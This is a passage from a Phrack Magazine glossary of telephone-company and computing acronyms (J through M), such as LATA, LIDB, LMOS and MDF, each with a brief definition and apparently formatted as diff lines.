+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 23 of 27
+
+                              {Acronyms Part III}
+
+J            Enter centrex (CTX) or multiline hunt group (MLHG) number
+JAD          Joint application design
+JAM          Jumper activity management
+JCL          Job control language
+JDC          Japan digital cellular
+JDC          Job duties code
+JDI          Job disposition indicator
+JDIP         Jmos/dopac interface process (comptroller system)
+JE           Job evaluation
+JEC          Journal entity code
+JES          Job entry subsystem (IBM)
+JES          Job entry system
+JES 2        Job entry system 2 (IBM)
+JES 3        Job entry system 3 (IBM)
+JET          BTL TIRKS jumper evaluation technique
+JFC          Job function code
+JGF          Junctor grouping frame
+JIB          Job information block (VMS)
+JIM          Job information memorandum
+JIS          Jurisdictional interstate services
+JK           Jack
+JKLAP        Jack/key/and lamp access panel
+JL           Jumper length
+JMOS         Job management operations system
+JMOS/PT      JMOS/pricer-tracker
+JMOS/RPTS    JMOS reports
+JMOSCA       Jmos contract administration
+JMX          Jumbogroup multiplex
+JOSS         Job order status system (distribution services system)
+JOSSVM       Job order status system/VM
+JOVIAL       Jule's own version of the international algebraic language
+JP71         Joint practice 71
+JP80         Joint practice 80
+JPH          Jumper placement history
+JSC          Job status code
+JSN          Junction switch number
+JSW          Junctor switch
+JTR          Jitter
+JTRS         JMOS trouble reporting system (distribution services system)
+JUICE        JMOS user input card entry (distribution services system)
+K            DACS-SRDC
+K            Equipment frame designation
+K            Kilobit
+KBPS         Kilobits per second
+KCA          Key contributor award
+KCO          Keep cost order
+KD           Keyboard display
+KDROP        Key display receive only printer
+KDT          Keyboard display terminal
+KERMIT       Kermit
+KEY          Stop hunt or random make busy hunting
+KFT          Kilofeet
+KHZ          Kilo-hertz
+KHZ          Kilohertz
+KITSKOTS     Kansas inward toll service/Kansas outward toll service
+KOHM         Kilohms
+KOP          Thousands of operations per second
+KP           Key pulse
+KPR          Killer pair report
+KSDS         Key sequence data set (IBM)
+KSM          Create a transaction mask
+KSR          Keyboard send-receive
+KSU          Key service unit
+KTA          Korea telecommunication authority (ROK)
+KTS          Key telephone set
+KTS          Key telephone system
+KW           Keyword
+L            Shift preference (if any) for this work to be performed.
+L/AOS        Legal/advanced office system
+L2DOWN       Level 2 is inoperable.
+L2QLTY       Poor level 2 transmission quality.
+L3-ERC       Layer 3 error control (IOS)
+L3M          Layer 3 mgr. (IOS)
+LA           Local area data channel INTER/TRA blocal 1-26
+LA           Loop assignment
+LAC          LAN application controller
+LAC          Loop assignment center
+LAD          Label definition
+LAD          Loop activity data
+LADS         Local area data service
+LADT         Local access data transport
+LADT         Local area data transport
+LAI          Line equipment assignment inquiry
+LAIS         Local automatic intercept system
+LAJMS        Ledger and journal maintenance system
+LAMA         Local automatic message accounting
+LAMA-C       Computerized local AMA for No. 5 crossbar
+LAN          Local area network
+LANMS        Light amplified by stimulated emission of radiation
+LAP          Link access protocol
+LAPB         (LAP-B) link access procedure of balanced mode
+LAPD         (LAP-D) link access procedure of D-channels
+LAPD         Link access procedure on the D channel
+LAPM         (LAP-M) link access protocol for modems
+LAPX         Lapb extended (t.71)
+LARG         Lidb access routing guide
+LASS         Local alarm scanning system
+LASS         Local area signaling service
+LAT          Local access termianl (RMS-D1)
+LATA         Local access and transport area
+LATA         Local access and transport areas
+LATA         Local access transport area
+LATIS        Loop activity tracking information system
+LATIS I/F    Loop activity tracking information system interface
+LATIS/INPUT  Locally developed program used to input to the latis system
+LB           Voice-non switched line-service code for LATA access
+LBBD         Loopback B1
+LBI          Load balance index
+LBK          Loop test (SARTS command)
+LBK          Loopback
+LBL          Online tape label printing
+LBNCGI       LIDB BNS message with call gapping indicator present
+LBNGM        LIDB BNS garbled message
+LBNMGM       LIDB BNS return value missing group or misrouted
+LBNNAN       LIDB BNS return value no translation for an address of such
+              nature
+LBNNCG       LIDB BNS return value network congestion
+LBNNFL       LIDB BNS return value network failure
+LBNNPG       LIDB BNS return value nonparticipating group
+LBNNSA       LIDB BNS return value no translation for this specific address
+LBNREJ       LIDB BNS reject message received
+LBNSCG       LIDB BNS return value subsystem congestion
+LBNSFL       LIDB BNS return value subsystem failure
+LBNTO        LIDB BNS message missed because of timeout
+LBNUP        LIDB BNS message with unexpected reply
+LBNUUR       LIDB BNS return value unequipped user
+LBO          Line buildout
+LBP          Load balance parameters
+LBR          Large business remote
+LBRV         Low bit rate voice
+LBS          Land and building system
+LBS          Load balance system
+LBS          Load balance system (BTL) module of tnds
+LBST         Loopback device signature table
+LBU          Loopback devices signature table
+LBU          Loopback unit
+LBn          Loopback channel bn request (command in IOM2 monitor and EOC)
+LC           Line card
+LC           Line count
+LC           Output line count
+LC           Pending service order count
+LC           Voice-switched line-service code for LATA access
+LCAMOS       Loop cable administration and maintenance operations system
+              (predictor)
+LCC          Line class code
+LCCIS        Local common channel interoffice signaling
+LCCL         Line card cable
+LCCLN        Line card cable narrative
+LCD          List cable summary
+LCDCGI       LIDB CCRD message with call gapping indicator present
+LCDGM        LIDB CCRD garbled message
+LCDMGM       LIDB CCRD return value missing group or misrouted
+LCDN         Last called directory number
+LCDNAN       LIDB CCRD return value no translation for an address of such nature
+LCDNCG       LIDB CCRD return value network congestion
+LCDNFL       LIDB CCRD return value network failure
+LCDNPG       LIDB CCRD return value nonparticipating group
+LCDNSA       LIDB CCRD return value no translation for this specific address
+LCDR         Local call detail recording
+LCDREJ       LIDB CCRD reject message received
+LCDSCG       LIDB CCRD return value subsystem congestion
+LCDSFL       LIDB CCRD return value subsystem failure
+LCDTO        LIDB CCRD message missed because of timeout
+LCDUP        LIDB CCRD message with unexpected reply
+LCDUUR       LIDB CCRD return value unequipped user
+LCE          Line concentrating equipment frame
+LCEN         Line card equipment number
+LCI          LAN CPU interface
+LCIE         Lightguide cable interconnection equipment
+LCLOC        Line card location
+LCM          Line concentrating module
+LCMC         Line concentrating controller module
+LCN          Logical channel number
+LCN          Logical channel numbers
+LCOS         Line Class of service (GTE)
+LCP          Language conversion program
+LCP          List cable pairs
+LCR          Least cost routing
+LCR          Line concentration ratio
+LCRMKR       Line card remarks
+LCS.MIT.EDU  Telecomm digest archive site on the Internet
+LCS7         Link controller for signaling system No.7
+LCSE         Line card service and equipment
+LCSEN        Line card service and equipment narrative
+LD           Load
+LD           Loading division
+LD           Long distance
+LD           Voice switched trunk-service code for LATA access
+LDBM         Listing data base maintenance
+LDES         Long distance experimental schedule
+LDM          Logical data model
+LDMTS        Long distance message telecommunications service
+LDN          Listed directory number
+LDS          Local digital switch
+LDSU2        Local digital service unit - model 2
+LDT          Local display terminal
+LDU          Long distance usage analysis
+LE           Leading edge (bsp)
+LE           Line equipment
+LE           Local exchange (contains D-CTL)
+LE           Voice and tone-radio landline-service code for LATA access
+LEAD         Loop engineering assignment data
+LEAP         System testing tool to simulate multiple 3270 users
+LEAS         Lata equal access system
+LEC          Local exchange carrier
+LED          Last entry data
+LED          Light emitting diode
+LED          Light-emitting diode
+LEE          Nac related line equipment transfer order establishment
+LEFTS        Loop electronic forecasting and tracking system
+LEG          Customer training file
+LEIM         Loop electronic inventory module
+LEIM         Loop electronics inventory module
+LEIS         Loop engineering information system (applications)
+LEN          Line equipment number
+LENCL        Line equipment number class
+LENG         Length
+LERG         Local exchange routing guide
+LET          Line equipment transfers
+LETS         Law enforcement teletypewriter service
+LEV          Level
+LEW          Line equipment transfer withdrawal
+LF           Data low-speed-service code for LATA access
+LF           Lease file
+LF           Line Finder
+LF           Line feed
+LF           Line finder
+LF           Load factor
+LF           Low frequance
+LFACS        Loop facilities assignment and control system
+LFACS        Loop facility assignment and control system
+LFC          Load factor calculation
+LFR          Line failure report
+LFRC         Local field reporting code
+LG           Basic data-service code for LATA access
+LGC          Line group controller
+LGN          List hunt groups
+LH           Line hunting (i.252 f)
+LH           Voice and data-psn access trunk-service code for LATA access
+LI           Length indicator (SS7)
+LI           Link interface
+LIB          Line interface board
+LIDB         Line information data base
+LIDB         Line information database
+LIE          Left in equipment
+LIFECOST     Life cycle cost system
+LIFO         Last in
+LIJ          Left In Jumper
+LIM          Less than the specified number of pairs
+LIN          Line
+LIN          Transmit alit data to COSMOS
+LINCS        Lan integrated network communications system
+LINIS        Line and number inventory system
+LINK         Loop interface network
+LINK1        The basic rate interface transmission extension (BRITE)
+              link one is down
+LINK2        The BRITE link two is down.
+LINK3        The BRITE link three is down.
+LINK4        The BRITE link four is down.
+LINK5        The BRITE link five is down.
+LINK6        The BRITE link six is down.
+LIS          Library information system
+LIST         Listen
+LIT          Line insulation test
+LIT          Line insulation testing parameters
+LIU          Lats interface unit
+LIU          Line interface unit
+LIU          Line user interface
+LJ           Voice and data ssn access-service code for LATA access
+LK           Voice and data-ssn-intermachine trunk-service code for LATA
+              access
+LKNODE       Link node
+LL           Logical link
+LL           Long distance terminal line INTER/TRA blocal 1-26
+LL           Long lines
+LLC          Line load control
+LLC          Low level controller    sipx6100
+LLD          Low level device drivers (IOS)
+LLDB         Location life data base
+LLF          Line link frame
+LLID         Ll identifier
+LLL          Last look logic
+LLN          Line link network
+LLN          Line link network (ess)
+LLP          Link layer protocol (lapd)
+LLS          Local Line Switch (GTE)
+LME          Line module equipment
+LMMS         Local message metering system
+LMOS         Loop maintenance operations system
+LMOS         Loop maintenance operations systemr
+LMOS F/E     Loop maintenance operations system front end
+LMOS HOST    Loop maintenance operations system host
+LMOS I/F     Loop maintenance operating system interface
+LMS          Litigation management system
+LMS          Loop maintenance system
+LMS/TUM      Local measuring system/temporary usage measurement
+LMT          Local maintance operations system
+LMTS         Limits
+LMU          Line multiplexer unit
+LMX          L-multiplex
+LN           Data extension
+LN           Leased network
+LN           Loop normal (on-hook normal)
+LNA          Line and number administration
+LNA          Low noise amplifier
+LNBAS        Call failed due to the query being blocked at the switch
+LNBN         Call failed due to the query being blocked in the CCS network
+LNG          Longitudinal
+LNS          Line number status
+LO           Low threshold
+LOA          Limit operator attempts
+LOAD         Listing of acronym definition
+LOC          Local
+LOC          Local operating company
+LOC          Location of cable on frame
+LOCAP        Low capacitance
+LOCN         Location
+LOE          List originating line equipment
+LOE          Location operating entity
+LOES         Lajms online entry system
+LOF          Lock off-line
+LOF          Loss of frame
+LOGIC        Logistics integrated control system
+LOGU         Logical units assignments
+LOMS         Loop assignment center operations management system
+LON          Lock on-line
+LONALS       Local off-net access lines
+LP           Telephoto/facsimile-service code for LATA access
+LPA          Link pack area
+LPBK         Looped back
+LPCDF        Low profile combined distributing frame
+LPCDF        Low profile conventional distributing frame
+LPIE         Loop plant improvement evaluator
+LPIE2        Loop plant improvement evaluator 2
+LPK          Line concentrating equipment line packs
+LPM          Lines per minute
+LPM          Logistic planning module
+LPS          Log/print status
+LPT          Loop test
+LQ           Voice grade customized-service code for LATA access
+LR           Loop reverse (off-hook normal)
+LR           Protection relay-voice grade-service code for LATA access
+LRAP         Long route analysis program
+LRC          Longitudal redundancy check
+LRC          Longitudinal redundancy check
+LRIA1        Long run incremental analysis i
+LRISP        Long range information systems planning organization
+LRM          Line resource monitor-ims (BMC)
+LRN          Local reference number
+LROPP        Long-rangeoutside plant planning
+LROT OR LRH  Local rotary
+LRP          Long rang planning
+LRS          Lease record system
+LRS          Line repeater station
+LRSS         Long range switching studies
+LS           Local service INTER/TRA blocal 1-26
+LS           Loop start signaling
+LS&E         Local service and equipment
+LSA          Local security administrator
+LSA          Local subaccount
+LSB          Lower side band
+LSBS         Location specific bypass system
+LSD&F        Local switching demand & facility data base system
+LSDB         Listing service data base
+LSDF         Local switching demand and facility data base system
+LSDN         Local switched digital network
+LSE          Line and station transfer order establishment
+LSEC         Loss of sec (C/I channel code)
+LSHF         Message LAN shelf
+LSI          Large-scale integrated circuitry
+LSL          Loss of signal level (C/I channel code)
+LSM          Load synchronization mechanization
+LSM          Local switching module
+LSN          Logical session number
+LSO          Local service office
+LSO          Local storage option-ims (IBM)
+LSRP         Local switching replacement planning
+LSRP         Local switching replacement planning system
+LSS          Lata switching systems
+LSS          Listing service system
+LSS          Listing services system
+LSS          Loop switching system
+LSSGR        Lata switching systems generic requirements
+LSSI         Local special service inventory
+LSSR         Local special service results
+LSSU         Link state signal unit (SS7)
+LSSU         Link status signal unit
+LST          Line and station transfer
+LSU          Line switch unit
+LSU          Local storage unit
+LSU          Loss of signal level of u interface (C/I channel code)
+LSUE         Lsu error condition (C/I channel code)
+LSV          Latch switch verification
+LSV          Line status verifier
+LSW          Line and station transfer withdrawal
+LT           Lata tandem
+LT           Line termination
+LT           Local terminal
+LT           Long distance terminal trunk INTER/TRA blocal 1-26
+LT-S         Lt on s bus
+LT-T         Lt on t interface
+LTAB         Line test access bus
+LTB          Last trunk busy
+LTC          Line trunk controler
+LTC          Local test cabinet
+LTD          Local test desk
+LTD          Local test desk (#16
+LTD          Long term disability
+LTD          Lt disable (C/I channel code)
+LTERM        Logical terminal-ims (IBM)
+LTF          Light terminal frame
+LTF          Lightwave terminal frame
+LTF          Lightwave terminating frame
+LTF          Line trunk frame
+LTG          Line translation group
+LTG          Line trunk group
+LTI          Loop termination identifier
+LTMA         Lightwave terminal multiplex assembly
+LTMA         Lightwave terminating multiplexing assembly
+LTN          List telephone numbers
+LTOP         Long term disability plan
+LTP          Line and trunk peripherals
+LTP          Local test port
+LTP          Loop technology planning
+LTS          Loss test set
+LTU          Line trunk unit
+LTUC         Ltu control
+LU           Line unit
+LU 6.2       Protocol for appc
+LU2          Line unit model 2
+LUA          Link up america tracking
+LUCHBD       Line unit channel board
+LUCOMC       Line unit common control
+LUHLSC       Line unit high level service circuit
+LUIF         Living unit interface file
+LUM          Line utilization monitor-ims (BMC)
+LUPEX        Line unit path exerciser
+LURR         Large user reproduced records system
+LV           Sdlv
+LVL1ERR      Level 1 protocol error.
+LVL2ERR      Level 2 protocol error.
+LVL3ERR      Level 3 protocol error.
+LVM          Line verification module
+LW-SSS       Lightwave system support services by weco
+LWC          Leave word calling
+LX 2         Local originating
+LX 2         Local terminating
+LXE          Lightguide express entry
+LZ           Dedicated facility-service code for LATA access
+M            Latest date that this ticket can be loaded.
+M            M(transmit) signal lead
+M            Maintance
+M            Minutes
+M LETTER     Methods letter
+M O          Master office
+M S          Main station
+M S          Mark sense
+M&P          Methods and procedures
+M-MONEY      Maintenance money
+M-STARS      Measurement and statistics tracking and reporting system
+M/ATR        Maritime/aviation tracking reports
+M/W          Microwave
+M5           Five-minute
+MA           Cellular access trunk 2-way INTER/TRA blocal 1-26
+MA           Maintenance administrator
+MA           Multiple access (primary)
+MA02         Status requested
+MA03         Hourly report of system circuits and units in trouble
+MA04         Reports condition of system - 1AESS maintenance
+MA05         Maintenance interrupt count for last hour - 1AESS maintenance
+MA06         Scanners
+MA07         Successful switch of duplicated unit (program store etc.)
+              - 1AESS
+MA08         Excessive error rate of named unit -1AESS maintenance
+MA09         Power should not be removed from named unit - 1AESS maintenance
+MA10         Ok to remove paper - 1AESS maintenance
+MA11         Power manually removed from unit - 1AESS maintenance
+MA12         Power restored to unit - 1AESS maintenance
+MA13         Indicates central control active - 1AESS maintenance
+MA15         Hourly report of # of times interrupt recovery program acted - ma
+MA17         Centrex data link power removed - 1AESS maintenance
+MA21         Reports action taken on mac-rex command -1AESS maintenance msg
+MA23         4 minute report- emergency action phase triggers are inhibited
+MAB          Metallic access bus
+MAC          Machine administration center
+MAC          Major accounting center
+MAC          Mechanized assignment control (BTL)
+MAC          Missed appointment code
+MAC          Monitor analysis & control of fa standard values
+MACBS        Multi-access cable billing system
+MACS         Major apparatus and cable system
+MACS         Mechanized analysis of customer systems
+MACS(DS)     Major apparatus control system (dist. svcs)
+MADN         Multiple access directory numbers
+MADPE        Address parity error
+MAEC         Media access error counter
+MAI          Multiple access interface (univac)
+MAILLOG      Manager electronic mail logging system
+MAINT        Maintenance
+MAINT        Maintenance handler
+MAL          Maintance action limits
+MAL          Manual assignment list
+MALRU        Mechanized automatic line record update
+MALT         Maintence transmission action limit table
+MAMA         Mechanized automatic message accounting
+MAMA         Mobile automatic message accounting
+MAN          Manual
+MAN          Metropolitan area network
+MAN          Miscellaneous account number
+MAP          Maintance and administration position
+MAP          Maintenance and administration position
+MAP          Maintenance and administrative position (NTI)
+MAP          Management assessment program
+MAP          Manual assignment parameters
+MAP          Manufacturing automation protocol
+MAP          Mobile application part
+MAPCI        Map command interpreter (NTI)
+MAPPER       Maintain and prepare executive reports
+MAPS         Mechanized accounts payable system
+MAPS         Modeling and planning system (BTL)
+MAPSS        Maintenance & analysis plan for special services
+MAPSS        Maintenance and analysis plan for special services
+MAQ          Manual assignment file inquiry
+MAR          Market analysis report (BTL)
+MAR          Microprogram address register
+MAR          Multi-alternate route
+MARC         Market analysis of revenue and customers system
+MARC         Market analysis of revenues and customers
+MARC/CAPS    Market analysis of personnel and customer analysis profile
+MARCH        A computer system
+MARG         Margin Parameter
+MARK         Mechnized Assiment Record Keeping System (GTE COSMOS)
+MARK IV      General purpose information storage and retrieval system
+MARS         Mechanized automative repair system
+MARS         Multiple access repair system
+MAS          Interfacesmessage analysis sampling plan
+MAS          Main store
+MAS          Mass announcement system (900 service)
+MAS          Memory administration system
+MASB         Mas bus
+MASC         Mas controller
+MASM         Mas memory
+MAST         Mail analysis and sales tracking
+MAT          Manual assistance tag
+MAT          Metropolitan area trunk
+MATFAP       Metropolitan area transmission facility analysis program
+MATR         Maritime/aviation tracking system
+MATR         Modified answering time recorder
+MATS         Marketing access tracking system
+MATS         Mechanized analysis of traffic studies system
+MAVIS        McDonnel Douglas automatic voice information system (model 1018t)
+MAX          Maximum
+MAX          Maximum messages
+MAX          Maximum percentage value of entity fill or maximum ccs value
+MAXS         Metallic automatic cross-connected system
+MAY          Modify an assembly
+MB           Make busy
+MB           Make-busy or made-busy
+MB/S         Megabits per second.
+MBO          Management by objectives
+MBP          Metallic bypass pair
+MBPS         Megabits per second
+MBX          Measured branch exchange
+MBYTE        Megabyte
+MC           Machine congestion
+MC           Maintance connector
+MC           Maintenance center
+MC           Maintenance circuit
+MC           Marker class of service
+MC           Memory controller
+MCA          Misrouted centralized automatic message accounting (MDII)
+MCAS         Material cable administrative system
+MCB          Message control bank (sperry)
+MCC          Maintance control center
+MCC          Maintenance control center
+MCC          Manual camera control
+MCC          Master control center
+MCC          Minicuster controller
+MCCI         Mechanized customer contact index
+MCCRAP       Master control center trouble report analysis plan
+MCCS         Mechanized calling card service
+MCE          Establish a maintenance change ticket
+MCH          Maintenance channel
+MCH          Manually change hunt
+MCHB         Maintenance channel buffer
+MCI          Malicious call identification (i.251 g)
+MCI          Microwave communications incorporated
+MCIAS        Multi-channel intelligent announcement system
+MCIAS        Multi-channel intercept announcement system
+MCINT        Mate control interrupt
+MCL          Maintenance change list
+MCN          Machine congestion level # where MCI=machine congestion level
+MCN          Master control number
+MCN          Metropolitan campus network
+MCOS         Multiplexer out of synchronization
+MCP          Mechanized credit provisioning system
+MCR          Establish a maintenance change repair
+MCR          Mass call register
+MCS          Master cpu subsystem
+MCS          Meeting communications service
+MCS          Multiple console support
+MCTAP        Mechanized cable transfer administration plan
+MCTRAP       Mechanized customer trouble report analysis plan
+MCTSI        Module controller/time slot interchange
+MCTSI        Module controller/time-slot interchange unit
+MCW          Maintenance change ticket withdrawal
+MD           SS7fe message distributor
+MD/RS        Mechanized denial/restoral system
+MDACS        Modular digital access control system
+MDC          Manually disconnect a working circuit
+MDC          Marker distributor control
+MDC          Materials distribution center
+MDC          Meridian digital centrex
+MDCMES       Management development center mechanized enrollment system
+MDF          Main distributing frame
+MDF          Main distribution frame
+MDII         Machine detected interoffice irregularities
+MDII         Machine-detected interoffice irregularity
+MDIS         Marketing data interface system
+MDLIE        DLI interface error
+MDOG         Mechanized disbursement of gasoline
+MDP          SS7 fe message distribution protocol
+MDR          Mechanized draft reconciliation
+MDR          Message detail record
+MDS          Message design systems
+MDT          Management development/training
+MDU          Marker decoder unit
+MDX          Modular digital exchange
+ME           Management employment
+ME & ASSM    Management employment & assessment
+ME CORP      Corporation management employment
+MEANS        Model for economic analysis of network service
+MEAS         Measure
+MEASMT       Measurement
+MEC          Maintenance engineer center
+MEC          Manually establish a circuit
+MEC          Mobile equipment console
+MECA         Mechanization of engineering & circuit provisioning
+MECAB        Multi exchange carrier access billing
+MECCRRF      Mechanized credit reference system
+MECH         More efficient call handling
+MECOD        Multiple exchange carrier ordering and design
+MED          Medium threshold
+MED          Multipoint end-link data
+MEDPLUS      Medicare part b reimbursement payments
+MEDS         Mechanized expense distribution system
+MEF          Master employee file
+MELD         Mechanized engineering and layout for distributing frames
+MEP          Medical expense plan
+MERITS       Measurement of exchange records integrity through sampling
+MERP         Mechanization of estimate results plan
+MERS         Most economic route selection
+MERT         Master employee record tape
+MESA         Mechanized edits of street address
+MESS         Message
+MET          Multibuton electronic telephone
+MET          Multibutton electronic telephone
+METASX       Metallic access
+MF           Mainboard firmware (IOS)
+MF           Multi frame
+MF           Multi frequency
+MF           Multifrequency
+MF           Multiplexer frame
+MFAS         Mechanized forecasting and analysis system
+MFC          Master file directory (VMS-catalog of UFDS)
+MFC          Modular feature construction
+MFC          Multiple frame operation control (IOS)
+MFENET       Magnetic fusion energy network
+MFFAN        Miscellaneous frame (CM2 offices only)
+MFJ          Modification of final judgement
+MFJ          Modification of final judgment
+MFJ          Modified final judgment (consent decree)
+MFR          Discmanufacture discontinued
+MFR          Mechanized force report
+MFR          Multi-frequency receivers
+MFRS         Management force reporting system
+MFS          Message formatting service-ims (IBM)
+MFT          Metallic facility terminal
+MFT          Multiprogramming with a fixed number of tasks
+MG           Marker group
+MG           Marker group number
+MG           Mastergroup
+MGB          Main ground bus
+MGB          Master ground bar
+MGBAF        Maintenance group blocking acknowledgment failure
+MGR          Manager
+MGSC         Message service customer counts
+MGSG         Message service multi-line hunt
+MGT          Mastergroup translator
+MGUAF        Maintenance group unblocking acknowledgment failure
+MH           Modified huffman code (fax)
+MHD          Moving head disk
+MHD          Moving head disk drive(s) used in the am.
+MHDC         Moving head disk control
+MHDDC        Moving head disk data/clock
+MHS          Message handling service
+MHS          Message handling system
+MHZ          Megahertz
+MI           Machine interface
+MI           Message interface  on the
+MI           Swbt minimal input
+MIAS         Marketing information analysis system
+MICA         Mechanized intercompany contract administration
+MICC         Minicluster controller
+MICE         Modular integrated communications environment
+MICI         Mechanized independent company input
+MICR         Minimal input customer records
+MICRO/TEL    Micro/tel force analyzer
+MICS         BTL maintenance space inventory control system
+MICU         Message interface and clock unit
+MICU         Message interface clock unit
+MID          Master interim design
+MIFM         Mechanized installation force management
+MIG          Mechanized interval guide system
+MIIS         Management inventory information system
+MIMIC        Mts-wats intrastate model for incremental cost
+MIN          Minimum
+MIN          Minimum percentage value of entity fill or minimum CCS value
+MIN          Mobile identification number
+MINX         Multimedia information network exchange
+MIOIO        I/O invalid operation error
+MIOLE        I/O lock error
+MIOPE        I/O bus parity error
+MIOTO        I/O timer time out error
+MIOUE        I/O unlock error
+MIP          Microprocessor interface port
+MIPP         Management surplus income protection plan
+MIPS         Million instructions per second
+MIR          Micro-instruction register
+MIRA         Maintenance input request administrator .
+MIRA         Mark iv information retrieval aid
+MIS          Management information system
+MIS          Mechanized intercepting system
+MIS/C        Management information system/computer
+MISC         Miscellaneous
+MISCF        Miscellaneous frame
+MISS         Management information staffing system
+MITS         Microcomputer interactive test system
+MIU          Metallic interdace unit
+MIZAR        Management job evaluation
+MJEC         Multiple job function codes
+MJF          Modified final judgement
+MJU          Multipoint junction unit
+MKBUSY       Make busy.
+MKR          Marker
+MKTG         Marketing
+ML           Matching loss
+MLAC         Manual loop assignment center
+MLC          Miniline card
+MLC          Monitor level code
+MLCD         Multi-line call detail
+MLH          Multiline hunt
+MLHG         Multi-line hung group
+MLHG         Multiline hunt group
+MLI          Message link interface
+MLIIBLNG     Microlink II billing
+MLNC         Failure to match and no circuit
+MLPA         Modifiable link pack area (IBM)
+MLSS         Machine load service summary
+MLT          Mechanized loop test
+MLT          Mechanized loop testing system
+MLT-1        Mechanized loop testing system-1
+MLT-2        Mechanized loop testing - the second generation of equipment
+MLT-2        Mechanized loop testing system-2
+MMA          Multi-module access unit (Univac)
+MMC          Manually modify a circuit
+MMC          Minicomputer maintenance center
+MMEME        Memory system error
+MMG          Minicomputer maintenance group
+MMGT         Multimastergroup translator
+MMI          Man-machine interface
+MML          Man machine language
+MMM          Message mile minute
+MMOC         Minicomputer maintance operation center
+MMOC         Minicomputer maintenance operations center
+MMOCS        Minicomputer maintenance and operations center system
+MMP          Module message processor
+MMPP         Mechanized market programming procedures (BTL)
+MMRCS        Minicomputer maintenance and repair center system
+MMS          Main memory status
+MMS          Memory management system
+MMS/SSII     Marketing measurement system/support system II
+MMS43        Modified monitoring state 43 code
+MMSU         Modular metallic service unit
+MMT          Multiple message threshold
+MMU          Memory management unit (IOS)
+MMX          Mastergroup multiplex
+MN02         List of circuits in trouble in memory
+MNP          Microcom networking protocol
+MOC          Machine operations center
+MOC          Maintenance and operations console
+MOC          Maintenance operation console
+MOC          Ministery of communication
+MOC          Moe order completion
+MOD          Ministery of defense
+MOD          Modifier
+MOD          Modulated
+MOD          Module number
+MOD1         Miscellaneous per SM measurements (MOD1)
+MODCOES      Modified central office cost
+MODEM        Modulator-demodulator
+MOE          Mass oe transfers
+MOF          Mass oe frame transfer listings
+MOG          Minicomputer operations group
+MOI          Maintenance and operation interface
+MOI          Mizar order inquiry
+MOMS         Missouri marketing system
+MON          Monitor
+MON          Monitor channel (i.e. IOM2)
+MON          Mouth
+MOOSA        Mechanized out of service adjustment system
+MOOSE        Macs online organization system entry (distribution services)
+MOS          Maintenance and operations subsystem
+MOS          Metal oxide semiconductor
+MOSOP        Mechanized operator services occupational payroll
+MOST         Managing operations systems in transition
+MOSTED       Motor vehicle/special tools expense distribution
+MOT&R        Master office test and release circuit
+MOTS         Mechanized operations tracking system
+MOU          Minutes of use
+MOU-AS       The annual study module of DRP/MOU
+MOU-DA       The data accumulation module of DRP/MOU
+MOVE         Move remote line Concentrating module
+MOW          Moe order withdrawal
+MP           Maintance POSITION
+MP           Message processing program
+MP           Microprocessor
+MP           Multi-processor
+MPAP         Management potential appraisal plan
+MPC          Marker pulse conversion
+MPC          Messages per customer
+MPC          Mp command
+MPCG         Message processing clerical guide
+MPCH         Main parallel channel
+MPDB-OS      Outside plant-pair gain
+MPDBCOAR     MPDB-central office equipment and repair services
+MPDBSRVC     Office supplies computers and other services
+MPDU         Message protocpl data units (x.411)
+MPES         Message processing entry system
+MPFRS        Mechanized project force requirement system
+MPI          Mechanized project impact system
+MPK          Modify work package
+MPLR         Mechanized plant location records system
+MPLUM        Mechanized plant utilization management
+MPN          Master work package number
+MPOOS        Modem pool line out of service.
+MPOW         Multiple purpose operator workstation
+MPPD         Multi-purpose peripheral device
+MPRIN        Mate peripheral interrupt
+MPS          Mechanized pension system
+MPS          Misplaced start pulse
+MPS          Misplaced start pulse (MDII)
+MPT          Message transfer part
+MPTS         Market planning and tracking system
+MQ           Metalic customized-service code for LATA access
+MQH          Marker queue high
+MQL          Marker queue low
+MR           Maintenance request (BTL)
+MR           Measured rate
+MR           Message rate (BSP)
+MR           Message register
+MR           Message register COSMOS command
+MR           Modified read (relative element address designate
+MR           Monitor read (flow control bit in IOM2)
+MR/IBPS      Management report/integrated budget and planning system
+MRAA         Meter reading access arrangement
+MRCS         Modification request control system
+MRDB         Memory resident data base
+MRDYT        Ready time out
+MRF          Maintenance reset function
+MRF          Message refusal received (outgoing)
+MRF          Message retention file
+MRFA         Mechanized repair force administration
+MRFF         Master reference frequency frame
+MRFIS        Mechanized request for information systems
+MRO          Message register option
+MRP          Mechanized revenue planning system
+MRPS         Mobile radio priority system
+MRR          Mandatory review reporting
+MRS          Management reporting system (TNDS)
+MRSELS       Microwave radio & satellite eng. & lic
+MRTI         Message-rate treatment index  (AMA NTI)
+MRTS         Mechanized real time tracking system
+MRTTA        Message recording trunk trouble analysis
+MRWPE        Read or write parity error
+MS           Machine screw (BSP)
+MS           Maintenance state
+MS           Measured service
+MS           Mechanized scheduling
+MS           Memory subsystem
+MS           Menue software (sipb.exe)
+MS           Microseconds
+MS6E         Message switching #6 equipment
+MS7E         Message switching #7 equipment
+MSA          Management science america
+MSAG         Master street address guide
+MSC          Media stimulated calling
+MSC          Minimum service charge
+MSCP         Mass storage control protocol
+MSCS         Management scheduling and control system
+MSCU         Message switch control unit
+MSCU         Message switch controller unit
+MSDS         Material safety data sheet system
+MSFDB        Market share forecast data base
+MSGBUF       Message buffer
+MSGCLS       Message class
+MSGLOCK      Message lock
+MSGNO        Message number
+MSGP         Microcomputer support group programming
+MSGS         Message switch
+MSK          Output a transaction mask
+MSKMR        Mate reset
+MSM          Multi-state marketing system
+MSMTCH       Mismatch.
+MSN          Multiple subscriber number (i.251 b)
+MSORS        Mechanized sales office record system (BTL)
+MSP          Management salary plan
+MSP          Metropolitan service plan
+MSPR         Message switch peripheral unit
+MSR          Marketing surveys and reports
+MSR          Mechanized sales results system (mbt directory sales)
+MSR          Mechanized service record
+MSR          Mizar status report
+MSR/DIS      Mechanized service record/disability subsystem
+MSS          Mass storage system
+MSS          Mss is a dialup for... database of 1800 numbers...
+MSSS         Mechanized supply stock system
+MSTIC        Mechanized standard time increments (we/eplans)
+MSTS         Measured service tracking system
+MSU          Message signal unit
+MSU          Metallic service unit
+MSU          Msg. signal unit (SS7)
+MSUCOM       Metallic service unit common
+MSUS         Measured service usage studies
+MSUSM        Subunit select mismatch
+MT           Master record tape unit number or tape drive to write
+MT           Wired music INTER/TRA blocal 1-26
+MTA          Message transfer agent (x.400)
+MTAE         Message transfer agent entity (x.400)
+MTB          Magnetic tape billing
+MTB          Metallic test bus
+MTC          Facs maintenance transaction
+MTCE         Maintenance (default).
+MTCE         Maintenance parameters
+MTD          Magnetic tape drive
